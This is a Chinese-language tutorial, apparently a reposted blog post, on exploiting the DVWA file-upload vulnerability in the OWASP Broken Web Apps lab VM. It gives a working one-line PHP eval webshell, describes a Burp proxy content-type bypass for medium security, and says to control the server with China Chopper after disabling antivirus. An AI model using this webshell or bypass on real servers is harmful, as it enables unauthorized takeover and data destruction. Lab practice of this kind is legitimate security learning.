1.實驗環境
目標靶機:OWASP_Broken_Web_Apps_VM_1.2
下載地址
我們還需要中國菜刀和kali這兩個工具,把所有的殺毒軟體關了,不然中國菜刀可能會被殺毒軟體和諧,
實驗原理
1、檔案上傳(File Upload)是大部分Web應用都具備的功能,例如用戶上傳附件、修改頭像、分享圖片/視頻等
2、正常的檔案一般是檔案、圖片、視頻等,Web應用收集之后放入后臺存盤,需要的時候再呼叫出來回傳
3、如果惡意檔案如PHP、ASP等執行檔案繞過Web應用,并順利執行,則相當于黑客直接拿到了Webshell
4、一旦黑客拿到Webshell,則可以拿到Web應用的資料,洗掉Web檔案,本地提權,進一步拿下整個服務器甚至內網
5、SQL注入攻擊的物件是資料庫服務,檔案上傳漏洞主要攻擊Web服務,實際滲透兩種相結合,達到對目標的深度控制
2.低安全模式
首先我們需要用虛擬機打開目標靶機,并查看ip地址
root@owaspbwa:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
link/ether 00:0c:29:b2:da:ea brd ff:ff:ff:ff:ff:ff
inet 192.168.13.144/24 brd 192.168.13.255 scope global eth0
inet6 fe80::20c:29ff:feb2:daea/64 scope link
valid_lft forever preferred_lft forever
找到ip后,我們打開網頁訪問192.168.13.144
上傳我們已經寫好的小馬檔案(木馬)
檔案里面其實只有一行內容,所以叫做小馬
小馬: 一句話木馬也稱為小馬,即整個shell代碼量只有一行,一般是系統執行函式
大馬: 代碼量和功能比小馬多,一般會進行二次編碼加密,防止被安全防火墻/入侵系統檢測到
<?php @eval($_POST['yjssjm']);?>
格式不要動,只需要改''里面的東西就行了,yjssjm是你定義的密碼,與下面使用的中國菜刀密碼保持一致就行
然后我們去目標靶機上面查看并創建一個測驗檔案
root@owaspbwa:~# cd /owaspbwa/owaspbwa-svn/var/www/dvwa/hackable/uploads
root@owaspbwa:/owaspbwa/owaspbwa-svn/var/www/dvwa/hackable/uploads# ls
shell.php
root@owaspbwa:/owaspbwa/owaspbwa-svn/var/www/dvwa/hackable/uploads# echo 'aaaa' > a.txt #創建一個測驗檔案
root@owaspbwa:/owaspbwa/owaspbwa-svn/var/www/dvwa/hackable/uploads# ls
a.txt shell.php
設定好后我們雙擊點開
我們將a.txt洗掉,然后去服務器上查看,發現服務器上的a.txt檔案也被洗掉了,這就是利用了上傳漏洞進行攻擊,
3.中安全模式
我們將安全改為中等,這時候再上傳我們發現我們上傳失敗
這個時候我們需要用到kali這個工具作為代理,將我們訪問的訊息攔截,然后進行型別的改變再轉發過去就可以了,
打開kali,默認用戶名是root,密碼是toor
然后我們一直點右下角I Accept ---- next ------ Start Burp 進入就行了
然后我們需要去網頁上設定,將所有的訪問都轉到192.168.13.145
然后我們再次上傳,這個時候kali上面會顯示我們上傳的資訊
再看DVWA我們發現成功了
接下來就跟上面一樣了,我們可以在中國菜刀上對該服務器進行攻擊,
如果自己下載不好中國菜刀跟kali的小伙伴可以在評論區留下自己的郵箱,
在這里勸大家自己在自己電腦上試試就好了,要是造成了經濟損失就不好了,
你們的評論和點贊是我寫文章的最大動力,蟹蟹,
轉載請註明出處,本文鏈接:https://www.uj5u.com/caozuo/112772.html
標籤:Linux
上一篇:autowork自動化運維工具
下一篇:linux 之虛擬機的安裝與介紹